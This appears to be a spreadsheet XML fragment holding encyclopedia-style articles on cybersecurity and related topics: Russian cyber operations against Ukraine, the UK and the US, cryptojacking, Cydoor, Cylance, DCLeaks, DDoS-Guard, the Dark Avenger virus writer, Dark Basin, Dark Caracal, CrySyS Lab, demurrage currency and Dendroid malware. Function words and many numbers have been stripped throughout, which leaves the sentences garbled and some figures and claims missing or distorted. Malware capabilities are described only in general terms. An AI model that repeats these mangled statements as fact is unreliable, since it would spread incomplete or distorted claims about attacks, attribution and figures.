cyber attacks 2018 winter olympics south korea. worm responsible cyber attacks known "olympic destroyer". worm targeted olympic infrastructure, succeeded taking wifi, feeds jumbotrons, ticketing systems, olympic systems. timed start opening ceremonies. unique hackers attempted many false signatures blame countries north korea china. ukraine march 2014, russian cyber weapon called snake "ouroboros" reported created havoc ukrainian government systems. snake tool began spreading ukrainian computer systems 2010. performed computer network exploitation (cne), well highly sophisticated computer network attacks (cna).from 2014 2016, according crowdstrike, russian fancy bear used android malware target ukrainian army's rocket forces artillery. they distributed infected version android whose original purpose control targeting data d-30 howitzer artillery. app, used ukrainian officers, loaded x-agent spyware posted online military forums. crowdstrike claims attack successful, ukrainian d-30 howitzers destroyed, highest percentage loss artillery pieces army percentage never previously reported would mean loss nearly entire arsenal biggest artillery piece ukrainian armed forces.). according ukrainian army, number incorrect losses artillery weapons "were reported" losses "have nothing stated cause".the u.s. government concluded study cyber attack caused power outage ukraine left 200,000 people temporarily without power. russian hacking group sandworm russian government possibly behind malware attack ukrainian power grid well mining company large railway operator december 2015. similar attack occurred december 2016.in february 2021 ukraine accused russia attacking system electronic interaction executive bodies portal used ukrainian government circulate documents uploaded documents contained macroscripts downloaded enabled would lead computer secretly download malware would allow hackers take computer.in january 2022, cyberattack ukraine took website ministry foreign affairs government agencies. although investigation conclusive cyber attacks coincide russo-ukrainian crisis. february 2022, russian troops entered eastern ukraine amid environment escalating tensions ukraine russia, several major ukrainian governmental business websites taken series cyberattacks. u.s. officials attributed attacks russian attackers, although russian government denied involvement. 2014 ukrainian presidential election pro-russian hackers launched series cyberattacks several days disrupt 2014 ukrainian presidential election, releasing hacked emails, attempting alter vote tallies, delaying final result distributed denial-of-service (ddos) attacks. malware would displayed graphic declaring far-right candidate dmytro yarosh electoral winner removed ukraine's central election commission less hour polls closed. despite this, channel russia "reported yarosh broadcast fake graphic, citing election commission's website, even though never appeared there." according peter ordeshook: "these faked results geared specific audience order feed russian narrative claimed start ultra-nationalists nazis behind revolution ukraine." united kingdom "brexit" referendum referendum united kingdom exiting european union ("brexit"), prime minister david cameron suggested russia "might happy" positive brexit vote, remain campaign accused kremlin secretly backing positive brexit vote. december 2016, bradshaw claimed parliament russia interfered brexit referendum campaign. february 2017, bradshaw called british intelligence service, government communications headquarters, boris johnson foreign secretary, reveal information russian interference. april 2017, house commons public administration constitutional affairs select committee issued report stating, regard june 2016 collapse government's voter registration website less hours prior originally scheduled registration deadline (which extended), "the crash indications ddos 'attack.'" report also stated direct evidence" supporting "these allegations foreign interference." cabinet office spokeswoman responded report: clear cause website outage june 2016. spike users registration deadline. there evidence suggest malign intervention."in june 2017, reported guardian "leave" campaigner nigel farage "person interest" united states federal bureau investigation russian interference united states 2016 presidential election. october 2017, members parliament culture, media sport committee demanded facebook, twitter, google social media corporations, disclose adverts details payments russia brexit campaign. united states april 2015, reported "russian hackers" "penetrated sensitive parts white house" computers "recent months." said fbi, secret service, u.s. intelligence agencies categorized attacks "among sophisticated attacks ever launched u.s. government systems."in 2015, reported russian hackers, likely working russian government, suspected state department hack. federal enforcement, intelligence congressional officials briefed investigation hack state department email system "worst ever" cyberattack intrusion federal agency.in february 2016, senior kremlin advisor russian cyber official andrey krutskikh told russian national security conference moscow russia working strategies "information arena" equivalent testing nuclear bomb would "allow talk americans equals".in 2016, release hacked emails belonging democratic national committee, john podesta, colin powell, among others, dcleaks wikileaks said private sector analysts intelligence services russian origin. also, december 2016, republicans democrats senate committee armed services called special select committee investigate russian attempts influence presidential election".in 2018, united states computer emergency response team released alert warning russian government executing multi-stage intrusion campaign russian government cyber actors targeted small commercial facilities' networks staged malware, conducted spear phishing, gained remote access energy sector networks." noted "[a]fter obtaining access, russian government cyber actors conducted network reconnaissance, moved laterally, collected information pertaining industrial control systems." hacks targeted least dozen u.s. power plants, addition water processing, aviation, government facilities.in june 2019, york times reported hackers united states cyber command planted malware potentially capable disrupting russian electrical grid. according wired senior writer andy greenberg, "the kremlin warned intrusions could escalate cyberwar countries."over several months 2020, group known apt29 cozy bear, working russia's foreign intelligence service, breached cybersecurity firm multiple u.s. government agencies including treasury, commerce, energy departments national nuclear security administration. hacks occurred network management system called solarwinds orion. u.s. government emergency meeting december 2020, press reported hack next day. when russia's foreign intelligence service performs hacks, typically "for traditional espionage purposes, stealing information might help kremlin understand plans motives politicians policymakers," according washington post, purpose leaking information public. february 2021 report dragos stated sandworm targeting electric utilities, gas, industrial firms since least 2017 successful breaching firms "handful" times. venezuela after news website runrun.es published report extrajudicial killings bolivarian national police, 2019, venezuelan chapter instituto prensa sociedad (ipys), pointed website service uncached request attack, denouncing originated russia. false alarms december 2016, burlington electric department, vermont utility company, announced code associated russian hacking operation dubbed grizzly steppe found computers. officials department homeland security, office director national intelligence warned executives financial, utility transportation industries malware code. first report washington post left impression grid penetrated, hacked computer attached grid. later version attached disclaimer report correcting impression: "editor's note: earlier version story incorrectly said russian hackers penetrated u.s. electric grid. authorities indication far. computer burlington electric hacked attached grid." also cyberwarfare china cyberwarfare united states darkside (hacking group) list cyber warfare forces military history russian federation mueller report timeline russian interference 2016 united states elections timeline russian interference 2016 united states elections (july 2016 election day) brigades internet research agency (aka trolls olgino) vaccine hesitancy references further reading andrew bowen, "russian cyber units," congressional research service, january 2021, https://crsreports.congress.gov/product/pdf/if/if11718 spencer ackerman thielman, officially accuses russia hacking interfering election," guardian, october 2016, accessed august 2017, https://www.theguardian.com/technology/2016/oct/07/us-russia-dnc-hack-interfering-presidential-election halpern, sue, "the drums cyberwar" (review andy greenberg, sandworm: cyberwar hunt kremlin's most dangerous hackers, doubleday, 2019, pp.), york review books, vol. lxvi, december 2019),</t>
  </si>
  <si>
    <t>Cryptojacking</t>
  </si>
  <si>
    <t>cryptojacking hijacking computer mine cryptocurrencies users will, websites, user unaware. notable piece software used cryptojacking coinhive, used two-thirds cryptojacks march 2019 shutdown. cryptocurrencies mined often privacy coins--coins hidden transaction histories--such monero zcash. cryptojacking malware cryptojacking malware malware infects computers mine cryptocurrencies usually without users knowledge. cryptojacking (also called malicious cryptocurrency mining) emerging internet threat hides computer mobile device, uses machine's resources "mine" various forms digital currencies known cryptocurrencies. burgeoning threat take browsers, well compromise types devices, desktops laptops smartphones even network servers. like malicious attacks computing public, motive profit, unlike threats, designed remain completely hidden user. cryptojacking malware lead slowdowns crashes straining computational resources. notable events microsoft exchange server 2021, multiple zero-day vulnerabilities found microsoft exchange servers, allowing remote code execution. references</t>
  </si>
  <si>
    <t>Cydoor</t>
  </si>
  <si>
    <t>cydoor spyware adware first detected 2003. cydoor software cydoor software downloads advertisements cydoor servers, displayed cydoor-supported software. built program integrated parent application uninstalled along automatically updates displays advertisements regardless speed internet connection user. cydoor consumes 3.4mb hard drive space, cannot uninstalled using windows uninstaller. uninstaller provided. cydoor often bundled commercial peer-to-peer file sharing programs kazaa, imesh exeem. also present download manager applications netants flashget. according cydoor desktop media, technology reaches million unique users worldwide.formerly, user could uninstall cydoor continue program installed sometimes longer case. cydoor treated vital piece software code parent program, removal cause program stop working. website's explains, "our components...are main revenue generating components software partners," explaining supposed necessity. programmers successfully removed cydoor's software kazaa (resulting kazaa lite kazaa resurrection). program known cause problems windows, company asserts buggy version software. code downloads advertisements "infected" system collect personal information. company said case unless "the user voluntarily supplied it". removal this software removed anti-spyware programs, ad-aware spybot search destroy. references external links cydoor article adware report dummy replacement cydoor</t>
  </si>
  <si>
    <t>Cylance</t>
  </si>
  <si>
    <t>cylance inc. american software firm based irvine, california developed antivirus programs kinds computer software sought prevent, rather reactively detect, viruses malware. cyber secure india described "the first company apply artificial intelligence, algorithms, machine learning cyber security."in february 2019, company acquired blackberry limited.cylance stated goal "block computer viruses malware effect user's computer". founding cylance founded stuart mcclure ryan permeh 2012. mcclure previously co-founder foundstone, security consultancy. sold foundstone mcafee 2004, became firm's chief tech officer. mcclure also author hacking exposed.cylance's founding came result mcclure's speeches cybersecurity. them, often asked protected computer. noted lacked trust security technology since reactive nature (for example, legacy antivirus technology), meaning cleaned attack prevented second time. consequently, mcclure began developing technology based "proactive protection". funding july 2015 report indicated cylance raised million investors including draper fisher jurvetson, kohlberg kravis roberts, dell, capitalone, teneleven ventures. received another $100 million june 2016 lead investors blackstone tactical opportunities (part blackstone group) insight venture partners. they received investment in-q-tel september 2015. product features mcclure claims cylance's antivirus product security features, unique signatures, heuristics, behavioral analysis, sandboxing, virtualization, blacklisting. rather, product claims artificial intelligence identify stop attackers. mcclure claims security features similar human brain's identifying threats, wherein "teaches" computers identify indicators attack. operation cleaver operation cleaver covert cyberwarfare operation allegedly carried iranian government targets worldwide, specifically critical infrastructure entities. cylance published report operation late 2014. iranian officials rejected cylance's conclusions, tacitly confirmed them. motex collaboration 2016, cylance announced collaboration motex, osaka-based firm, integrate motex lanscope, endpoint security management, cylanceprotect, cylance's leading product, claims proactively detect prevent malware. product called cylanceprotect cat. acquisition blackberry limited february 2019, company acquired blackberry limited $1.4 billion. controversies malware scandal november 2016, systems engineer evaluated files malware samples provided cylance testing protection system "protect", found malware. this accusation cylance using test look superior opponents providing files products would fail detect malware. response, cylance executives said used repackaged malware samples testing. honors awards company several awards.in march 2018, cylance 2018 mspworld award.in november 2017, linkedin recognized cylance "top companies startups" year 2017.in october 2017, cylance certified "great place work" greatplacetowork.com.in september 2017, cylance announced winner gartner peer insights customer choice award endpoint protection platforms gartner inc.in august 2017, cylance made inc. magazine's inc. 5000 list second year row.in 2017, cylance made cnbc disruptor list second year row.in march 2017, cylanceprotect named best endpoint protection product 2016 sans community.in july 2016, mcclure named orange county entrepreneur year category technology.in 2016, cylance ranked forbes cloud list. also antivirus software comparison antivirus software comparison computer viruses references</t>
  </si>
  <si>
    <t>Cyprus Papers</t>
  </si>
  <si>
    <t>cyprus papers leak government documents related cyprus investment program (cip) obtained jazeera released august 2020. allows non-citizens apply obtain cypriot passport investing least million euros cyprus. passports obtained nicknamed "golden passports". jazeera conducted investigation based leaked papers allegedly found republic cyprus provided citizenship several people linked crime corruption.on 12th october 2020, jazeera released video under-cover investigation related cyprus papers. video, jazeera reveals cypriot lawyers, business people top-tier politicians willing abet convicted criminals obtain cypriot citizenship, granting criminals access european union's internal markets visa-free travel. people appeared video included, among others, cyprus speaker house representatives demetris syllouris, member parliament christakis giovanis lawyer andreas pittadjis. notably video, demetris syllouris meets jazeera's under-cover journalists posing representatives actually non-existing chinese businessman convicted money-launderer seeks obtain cyprus passport cip. video footage, syllouris promises give support chinese businessman receives cypriot citizenship, even though providing citizenship convicted criminals requirements cypriot law. response jazeera's accusations, syllouris claimed actually playing along rest people shown video gather information criminal chinese businessman finally report case cyprus authorities.al jazeera's video sparked protests capital cyprus, nicosia. protesters demanded full, prompt transparent investigation immediate resignation president house representatives demetris syllouris member parliament christakis giovanis. result, demetris syllouris christakis giovanis resigned posts. furthermore, cyprus government announce would abolish november 2020. references</t>
  </si>
  <si>
    <t>DCLeaks</t>
  </si>
  <si>
    <t>dcleaks (also known leaks) website established june 2016. responsible publishing leaks emails belonging multiple prominent figures united states government military. cybersecurity research firms determined site front russian cyber-espionage group fancy bear. july 2018, indictment made russian military officers; alleged dcleaks part russian military operation interfere 2016 u.s. presidential election. identity site thought private cybersecurity analysts intelligence community part russian interference 2016 elections. cybersecurity research firm threatconnect concluded dcleaks project showed hallmarks russian intelligence, matching attack pattern hacker group fancy bear. threatconnect determined site likely linked russian persona guccifer gru-linked hacker group fancy bear.according dcleaks site's "about" page, find tell truth u.s. decision-making process [sic] well elements american political life." themselves, launched "the american hacktivists respect appreciate freedom speech, human rights government people."on july 2018 federal grand jury district columbia indicted members unit 26165 russian main intelligence directorate (gru) creating false identity dcleaks website, hacking democratic national committee releasing stolen data website. history domain name dcleaks.com registered april 2016, thcservers.com founded catalin florica former farm near craiova, romania. shinjiru technology kuala lumpur hosted dcleaks files electoral campaign. dcleaks.com website launched june 2016. leaks august 2016, press reported computer breached nearly year, summer 2015 another april 2016. attacker knocked network weekend june 2016.in late june 2016, guccifer informed reporters visit dcleaks website emails stolen democrats. with wikileaks disclosure additional stolen emails beginning july 2016, 150,000 stolen emails either personal gmail addresses related hillary clinton 2016 presidential campaign published dcleaks wikileaks websites.on july 2016, dcleaks released emails four-star general philip breedlove, former nato supreme commander europe. emails allegedly show breedlove sought overcome president barack obama's reluctance escalate military tensions russia russo-ukrainian 2014.on august 2016, dcleaks released roughly emails republican targets, including 2016 campaign staff arizona senator john mccain, south carolina senator lindsey graham, 2012 presidential candidate former minnesota representative michele bachmann. release included emails illinois republican party.on august 2016, dcleaks released information democratic lawmakers, including personal cellphone numbers. numerous crank calls hillary clinton received disclosure along loss campaign's email security caused severe disruption campaign subsequently changed contact information october 2016, calling contacts time.on august 2016, dcleaks released 2,576 files predominately related george soros' open society foundation. leak included foundation's internal work plans, strategies, priorities worldwide activities soros. response august 2017, dana rohrabacher meets julian assange ecuadorian embassy london offer assange pardon president trump assange could offer material supporting seth rich source email leaks democratic national committee 2016 russians. february 2020, rohrabacher told yahoo news goal meeting assange find evidence widely debunked conspiracy theory wikileaks' real source russian intelligence agents emails former staffer seth rich. stephanie grisham, white house spokesperson president trump, stated trump barely knows rohrabacher except he's ex-congressman spoken rohrabacher almost subject. february 2020, edward fitzgerald, julian assange's barrister, asserted westminster magistrates’ court london rohrabacher sent behalf president trump august 2017 offer assange pardon trump assange could release material show russian hackers involved 2016 united states election interference. however, july 2016, four days death seth rich, wikileaks received russian hackers stolen documents file emails.during november 2017, associated press revealed failed notify almost persons cross hairs kremlin-backed fancy bear's attack prominent government defense officials emails posted dcleaks. violation policy robustly informing victims hacking. indictments july 2018, deputy attorney general rosenstein announced twelve russian hackers, operating multiple units including units 26165 74455 main intelligence directorate general staff (gru), named 11-count indictment obtaining access distributing information data 500,000 voters state election board website well email accounts john podesta, hillary clinton, volunteers employees united states presidential campaign hillary clinton (clinton campaign), democratic congressional campaign committee (dccc) democratic national committee (dnc). following donald trump's request july 2016, rally florida vladimir putin russia hack trump's opponents networks, servers, emails make hillary clinton's 30,000 missing emails made public, russian hackers tried first time hack hillary clinton's personal offices.the mined bitcoins later purchase dcleaks domain operate dcleaks server guccifer server distribute information obtained hackers order discredit disrupt clinton campaign, dccc, bernie sanders presidential campaign, republican candidates donald trump presidential campaign would benefit 2016 election cycle. they obtained data 500,000 voters breaking voter verification software targeting local state election officials. although roger stone know names russian's sources, publicly stated russians contact trump campaign communicated them.russians also passed embarrassing information hacks wikileaks. this resignation chairwoman debbie wasserman-schultz july, 2016. using peer-to-peer exchanges pre-paid cards, russians mined used bitcoins public blockchain recorded transactions using hundreds emails fictitious names prevent monitoring united states authorities traditional financial transaction networks. internet research agency saint petersburg spearheaded parts operation. also 2016 democratic national committee email leak guccifer mueller report seth rich, individual falsely implicated facilitated email leaks russian interference 2016 united states elections notes references external links dcleaks website</t>
  </si>
  <si>
    <t>DDoS-Guard</t>
  </si>
  <si>
    <t>ddos-guard russian internet infrastructure company provides ddos protection, content delivery network services, hosting services. researchers journalists alleged many ddos-guard's clients engaged criminal activity, investigative reporter brian krebs reported january 2021 "vast number" websites hosted ddos-guard "phishing sites domains tied cybercrime services forums online". some ddos-guard's notable clients included palestinian islamic militant nationalist movement hamas, american alt-tech social network parler, various groups associated russian state. company ddos-guard based russia, employees. first registered july 2014 sevastopol, evgeny marchenko dmitry sabitov, russians formerly ukraine. company incorporated scotland cognitive cloud belize ddos-guard corp.a company name, owned men, previously existed ukraine since 2011, though spokespeople company said early stage company created software developed. spokespeople stated ddos-guard always based russia, rostov-on-don, although meduza reported office city open 2015. meduza reported company apparently relocated russia ukrainian national security cyberpolice officers began investigations company choice host verified, forum notorious platforming credit card scammers. ddos-guard denied knowledge investigation.in 2021, researcher observed ddos-guard appeared physical presence belize likely incorporated gain access addresses normally allocated local entities. 11,000 addresses assigned ddos-guard's subsidiaries, researcher found thirds provided belizean company lacnic, regional internet registry responsible latin america caribbean. ddos-guard rebutted allegations, said presence belize. after researcher reported ddos-guard lacnic, lacnic announced would revoke 8,000 addresses company.on june 2021, cyber-intelligence company group-ib reported found ddos-guard's database, containing site addresses, names, payment information along full source code, purchase cybercrime black market forum. authenticity allegedly stolen data unverified. clients meduza reported that, according former employee, ddos-guard history working customers operate darknet. employee said charge higher rates customers, much smaller range choices internet service providers willing work them, often especially need website security services. some ddos-guard's clients included palestinian islamic militant nationalist movement hamas, imageboard 8kun, formerly known 8chan, online home american far-right qanon conspiracy theory. company said ended services hamas 8chan learning content sites news sources. ddos-guard ended services various clients informed activities journalists, meduza wrote company would likely need deny services large portion client base proactively monitor criminal activity. brian krebs, investigative reporter focusing cybercrime, wrote january 2021 "review several thousand websites hosted ddos-guard revelatory, includes vast number phishing sites domains tied cybercrime services forums online."ddos-guard suspected hosting multiple internet scammers responsible stealing banking data, world's largest online stores illegal drugs operates using infrastructure associated ddos-guard. ddos-guard also hosted website dedicated doxing participated 2019–20 hong kong protests. according meduza, website directly linked chinese authorities. ddos-guard also provides services daily stormer, american neo-nazi, white supremacist, holocaust denial website message board. verified verified platform meduza described "one internet's oldest notorious russian-language forums credit-card scammers". meduza reported beginning spring 2013, ukrainian national security cyberpolice began investigating ddos-guard allegedly servicing platform, said investigation likely ddos-guard reincarnate russian company 2014. ddos-guard said knowledge investigation. russian state january 2014, ddos-guard moved russia, company partnered largest domain registrars country, reg.ru. shortly after, company began working clients associated russian state. beginning 2016, ddos-guard began providing denial-of-service protection russian ministry defence. 2018, ddos-guard helped test russian state's deep packet inspection systems. ddos-guard works closely russian central bank. parler ddos-guard january 2021 providing denial-of-service attack protection services parler, american alt-tech social network deplatformed amazon services internet service providers 2021 united states capitol attack. wired noted parler's choice russian company ddos protection "could expose users russian surveillance site someday relaunch full ddos-guard" russian government's projects isolate country's internet. january 2021, united states house committee oversight reform began investigation parler asked parler for, among things, information agreements, documents, communications russian entities. letter parler requesting information, committee chair carolyn maloney described ddos-guard company "which ties russian government counts russian ministry defense clients". also cloudflare epik (company) references external links official website</t>
  </si>
  <si>
    <t>Dark Avenger</t>
  </si>
  <si>
    <t>dark avenger pseudonym computer virus writer sofia, bulgaria. gained considerable popularity early 1990s, viruses spread nationwide across europe well, even reaching united states australia. background origins 1980s 1990s, bulgaria blooming computer hardware industry specialized providing large numbers educational purposes. thus, many schools universities provided computers computer science commonly studied subject. this helped foster certain attitude computers among generation. april 1988, bulgaria's trade magazine computers, компютър (computer you), issued article explaining detail nature computer viruses even methods writing them. months that, bulgaria "visited" several foreign viruses, namely "vienna", "ping pong", "cascade". interest spawned article viruses huge, soon young bulgarian programmers began search ways devise viruses.soon wave bulgarian viruses erupted, started "old yankee" "vacsina" viruses. dark avenger made first appearance spring 1989. viruses dark avenger's first virus appeared early 1989 contained string, "this program written city sofia 1988–89 dark avenger". thus, first virus usually referred "dark avenger", eponymous author. infectious: virus active memory, opening copying executable file sufficient infect additionally, virus also destroyed data, overwriting random sector disk every 16th infected program, progressively corrupting files directories disk. corrupted files contained string, "eddie lives... somewhere time!"—possibly reference iron maiden's album somewhere time. highly infectious nature, virus spread worldwide, reaching western europe, ussr, united states, even east asia. even received moderate mention york times washington post.dutch author harry mulisch reported encountered virus laptop writing magnum opus discovery heaven logbook october 1981 51st chapter book, book’s cabalistic nature, interpreted “favourable sign higher powers”, subsequently considered referring raven named edgar (after edgar allen poe’s short story) appeared corrupted scene book, even considered naming upcoming eduard, virus’ output ‘eddie lives... somewhere time’, though eventually named menzo instead. weeks later, november re-encountered virus, throughout 23–27 november eventually virus professionally removed.this virus soon followed others, employing clever trick. dark avenger believed authored following viruses: dark avenger, v2000 (two variants), v2100 (two variants), 651, diamond (two variants), nomenklatura, (six variants), 800, 1226, proud, evil, phoenix, anthrax, leech. major means spreading source code viruses, dark avenger used popular bulletin board systems. variants, virus also contained following strings: "zopy (sic) want travel" "only good young..." "copyright 1989 vesselin bontchev"in technical terms, prominent feature dark avenger's viruses polymorphic engine, mutation engine (mte); could linked plain virus order generate polymorphic decrypters. dark avenger not, however, invent polymorphism itself, since already predicted fred cohen later practice mark washburn, 1260 virus, 1990. year later dark avenger's viruses began employ polymorphic code. dark avenger made frequent attacks bulgarian anti-virus researcher vesselin bontchev. such case viruses v2000 v2100, claim written bontchev, attempt defame him. this "conflict" many believe bontchev dark avenger intentionally "promoting" might even person. dark avenger's actions treated crime time bulgaria, since information protection. identity identity person behind pseudonym never ascertained. however, inferred various details viruses. additionally, dark avenger subject interview conducted sarah gordon contains revealing information. some dark avenger's contemporaries, mainly vesselin bontchev, also shed light potential identity. dark avenger heavy metal music. string eddie lives...somewhere time, virus outputs, draws attention. eddie name mascot heavy metal band iron maiden. additionally, somewhere time title band's sixth album. furthermore, interview gordon, dark avenger states named song"; manowar (another heavy metal band) song titled dark avenger, debut album. viruses, anthrax named heavy metal band name. some hypothesize dark avenger vesselin vladimirov bontchev fact "vesselin bontchev" mentioned 1989 virus dark avenger soon bontchev written doctoral thesis computer viruses. interview sarah gordon victims dark avenger's viruses sarah gordon, computer security researcher. gordon became intrigued virus joined virus-exchange bulletin board system ("bbs") search information. thus, randomly came upon dark avenger, avid visitor participant. came contact maintained e-mails several years. sarah gordon later compiled e-mails makeshift interview. interview offers best available insight dark avenger's personality motives, contains valuable information. dark avenger previously stated several occasions "destroying data pleasure". however, "interview", confesses regrets actions, right. degree dark avenger exposes gordon many believe held deep affection her. even went devoting viruses her. suggested virus writers dark avenger personality social experiment gordon object study herself, helping build myth. others hypothesized gordon dark avenger. references wang, wallace (2006). steal this book what they won't tell about internet. starch press. isbn 1-59327-105-0. external links downloads three versions interview dark avenger made sarah gordon interview dark avenger made sarah gordon (another link) general psychological profile virus writers sarah gordon general psychological profile virus writers sarah gordon many papers virus writers sarah gordon dark avenger virus information heart darkness, david bennahum</t>
  </si>
  <si>
    <t>Dark Basin</t>
  </si>
  <si>
    <t>dark basin hack-for-hire group, discovered 2017 citizen lab. they suspected acted behalf companies wirecard exxonmobil. background 2015, matthew earl, managing partner shadowfall capital research, began study wirecard hoping short sell them. wirecard announced purchase great indian retail group $254 million, seemed overpriced earl. february 2016, started write publicly discoveries alias zatarra research investigations, accusing wirecard corruption, corporate fraud, money laundering.soon after, identity zatarra research investigations revealed online, along surveillance pictures earl front house. earl quickly realized followed. employees jones day, firm representing wirecard, came visit earl gave letter, accusing collusion, conspiracy, defamation, libel, market manipulation. earl also started receive targeted phishing emails, appearing friends family members. spring 2017, earl shared emails citizen lab, research laboratory specializing information control. citizen lab's investigation initial findings citizen discovered attackers using custom shortener allowed enumeration, giving access list 28,000 urls. some urls redirected websites looking like gmail, facebook, linkedin, dropbox various webmails page customized name victim, asking user re-enter password.citizen baptized hacker group 'dark basin' identified several clusters among victims: american environmental organizations linked #exxonknew campaign: rockefeller brothers fund, climate investigations center, greenpeace, center international environmental law, change international, public citizen, conservation foundation, union concerned scientists, strategic services 350.org media outlets hedge funds, short sellers financial journalists international banks investment firms legal firms israel, france, belgium, norway, switzerland, iceland, kenya, nigeria petroleum energy companies eastern european, central european russian oligarchs well-resourced people involved divorces legal mattersthe variety targets made citizen think mercenary activity. research laboratory confirmed attacks successful. links india several clues allowed citizen assert high confidence dark basin based india. working hours timestamps dark basin phishing emails consistent working hours india, timezone: utc+5:30. cultural references instances shortening service used dark basin names related indian culture: holi, rongali pochanchi. phishing dark basin phishing source code, including files, available online. source code configured print timestamps india's timezone. file, showed testing activity, included address based india. links belltrox citizen believes high confidence, belltrox, also known belltrox infotech services belltrox d|g|tal security, company behind dark basin. belltrox, delhi-based company, advertises website activities penetration testing, certified ethical hacking, medical transcription. belltrox employees described noisy often posting publicly illegal activities. belltrox's founder sumit guptra previously indicted charged united states hack-for-hire scheme behalf visalus.belltrox used employees test dark basin's shortener. they also publicly posted screenshots links dark basin's infrastructure.hundreds people, working corporate intelligence private investigation, endorsed belltrox linkedin. some suspected possible clients. those endorsements included canadian government official, investigator federal trade commission, enforcement officers private investigators prior roles fbi, police, military branches government.on june 2020, belltrox took website. december 2021, meta (facebook) banned belltrox "cyber-mercenary" group. reactions both wirecard exxonmobil denied involvement dark basin. references</t>
  </si>
  <si>
    <t>Dark Caracal</t>
  </si>
  <si>
    <t>dark caracal spyware campaign conducted unknown group hackers since least 2012. campaign discovered electronic frontier foundation mobile security firm lookout, published findings january 2018. campaign mainly used phishing attacks (and cases physical access victims systems) order install malicious android applications, including ones imitate look feel popular instant messaging applications, victims systems gain full control devices. evidence found iphone users targeted, according google, none malicious applications found google play store. data allegedly stolen includes documents, call records, text messages, audio recordings, secure messaging client content, browsing history, contact information, photos, location data, information allows group identify targets look personal lives. component used monitor android devices known pallas; component used monitor windows devices variant bandook trojan.the campaign suspected state-sponsored linked lebanese government's general directorate general security. according reuters, "the researchers found technical evidence linking servers used control attacks gdgs office beirut locating wi-fi networks internet protocol address near building." researchers said certain "whether evidence proves gdgs responsible work rogue employee." report denied major general abbas ibrahim. references external links "dark caracal; cyber-espionage global scale", technical report lookout electronic frontier foundation</t>
  </si>
  <si>
    <t>CrySyS Lab</t>
  </si>
  <si>
    <t>crysys (hungarian pronunciation: [ˈkriːsis]) part department telecommunications budapest university technology economics. name derived "laboratory cryptography system security", full hungarian name crysys adat- rendszerbiztonság laboratórium. history crysys lab. founded 2003 group security researchers budapest university technology economics. currently, located infopark budapest. heads istván vajda (2003–2010) levente buttyán (2010-now). since establishment, participated several research industry projects, including successful projects (sevecom, ubisecsens wsan4cip). research results crysys recognized research contribution area security wireless embedded systems. area, members produced books book chapters journal papers conference papers patents internet draftthe publications impact factor obtained 7500 references. several publications appeared highly cited journals (e.g., ieee transactions dependable secure systems, ieee transactions mobile computing). forensics analysis malware incidents laboratory involved forensic analysis several high-profile targeted attacks.in october 2011, crysys discovered duqu malware; pursued analysis duqu malware result investigation, identified dropper file 0-day kernel exploit inside; finally released open-source duqu detector toolkit detect duqu traces running duqu instances. 2012, malware analysis team crysys participated international collaboration aiming analysis unknown malware, call skywiper. time kaspersky analyzed malware flame iran national cert (maher) malware flamer. later, turned same. other analysis published crysys include password analysis hungarian isp, elender, thorough hungarian security survey servers publications kaminsky attack. references</t>
  </si>
  <si>
    <t>Demurrage (currency)</t>
  </si>
  <si>
    <t>demurrage cost associated owning holding currency given period. sometimes referred carrying cost money. commodity money gold, demurrage cost storing securing gold. paper currency, take form periodic tax, stamp tax, currency holdings. demurrage sometimes cited economically advantageous, usually context complementary currency systems. theory while demurrage natural feature private commodity money, various times deliberately incorporated currency systems disincentive hoard money achieve efficient allocation capital society. particular, long-term investment financing, affects dynamics present value (npv) calculations. demurrage currency system reduces discount rates, thus increases present value long-term investment, thus gives incentive investments.unlike inflation, demurrage gradually reduces value currency held: functions negative interest tax) currency held versus inflation also reduces value savings retirement funds increases cpi. positive interest rate subsidy. both inflation demurrage reduce purchasing power money held time, demurrage fixed regular fees, inflation variety ways. inflation always easy predict stay fixed time, level demurrage fixed government. gresham's "bad money drives good" suggests demurrage fees would mean currency would suffer rapid circulation competing forms currency. this german-argentine economist silvio gesell propose demurrage means increasing velocity money overall economic activity.“only money goes date like newspaper, rots like potatoes, rusts like iron, evaporates like ether, capable standing test instrument exchange potatoes, newspapers, iron ether. money preferred goods either purchaser seller. part goods money need money means exchange, expect advantage possession money. must make money worse commodity wish make better medium exchange." hand, influential british economist john maynard keynes contended gesell's proposed demurrage fees could evaded liquid competing forms money therefore inflation preferable method achieve economic stimulation. history demurrage-charged local currency successfully tested austrian town wörgl 1932 1934, collected benefit unemployed, austrian central bank stopped experiment. similarly, 1936, social credit party-led government alberta, canada, introduced prosperity certificates attempt alleviate effects great depression, holders affix back certificate 1-cent stamp every week, certificate maintain validity. local scrip systems, many incorporated demurrage fees, also used across united states great depression, bankhead–pettengill bill february 1933 introduced congress institutionalize system national level treasury, documented irving fisher's book stamp scrip. bernard lietaer also documents book mysterium geld demurrage currency systems europe's high middle ages' bracteate systems ancient egypt's ostraka dated receipts storage grain credits currency systems prosperity societies. notable example demurrage founder mark brandenburg albert bear. earlier real-life experiments, demurrage money demonstrated significantly increase velocity money circulation, even incentivizing people taxes advance.the major central banks' post-world policy steady monetary inflation proposed keynes influenced gesell's idea demurrage currency, used inflation money supply rather fees increase velocity money attempt expand economy. proceeds system instances, demurrage charged sort central authority, paid fund. application fund varies widely among historical proposed systems. cases, used costs administering tax. currency question government, demurrage contribute general revenue. mutual credit systems positive accounts, credit threshold, debited demurrage trading (purchasing) certain period (e.g. month year last purchase). typically accrues administration account adds common credit pool. current examples islamic system zakat form demurrage. applies un-utilized assets annum basis, rate determined nature asset. cash gold, instance, rate 2.5% annum. chiemgauer regional community currency part bavaria, using demurrage system. also freigeld prosperity certificate seigniorage references external links taxonomy money systems, discussion relationship demurrage concept others t.h. greco. "money: understanding creating alternatives legal tender". white river junction, chelsea green publishing, 2001. bernard lietaer. future money. century; edition (february 2002) isbn 0-7126-9991-0 lietaer, bernard (2001). future money: create wealth, work, wiser world. london: century. isbn 0-7126-9991-0. freicoin smith, penchev, quantum money (2015) isbn 978-1517264048.</t>
  </si>
  <si>
    <t>Dendroid (malware)</t>
  </si>
  <si>
    <t>dendroid malware affects android targets mobile platform.it first discovered early 2014 symantec appeared underground sale $300. certain features noted used dendroid, ability hide emulators time. when first discovered 2014 sophisticated android remote administration tools known time. first trojan applications past google's bouncer caused researchers warn easier create android malware also seems followed footsteps zeus spyeye simple-to-use command control panels. code appeared leaked somewhere around 2014. noted binder included leak, provided simple bind dendroid legitimate applications. capable deleting call logs opening pages dialing number recording calls intercepting uploading images video opening application performing denial-of-service attacks changing command control server also botnet mirai shedun zombie (computer science) kill system references</t>
  </si>
  <si>
    <t>Cross-site request forgery</t>
  </si>
  <si>
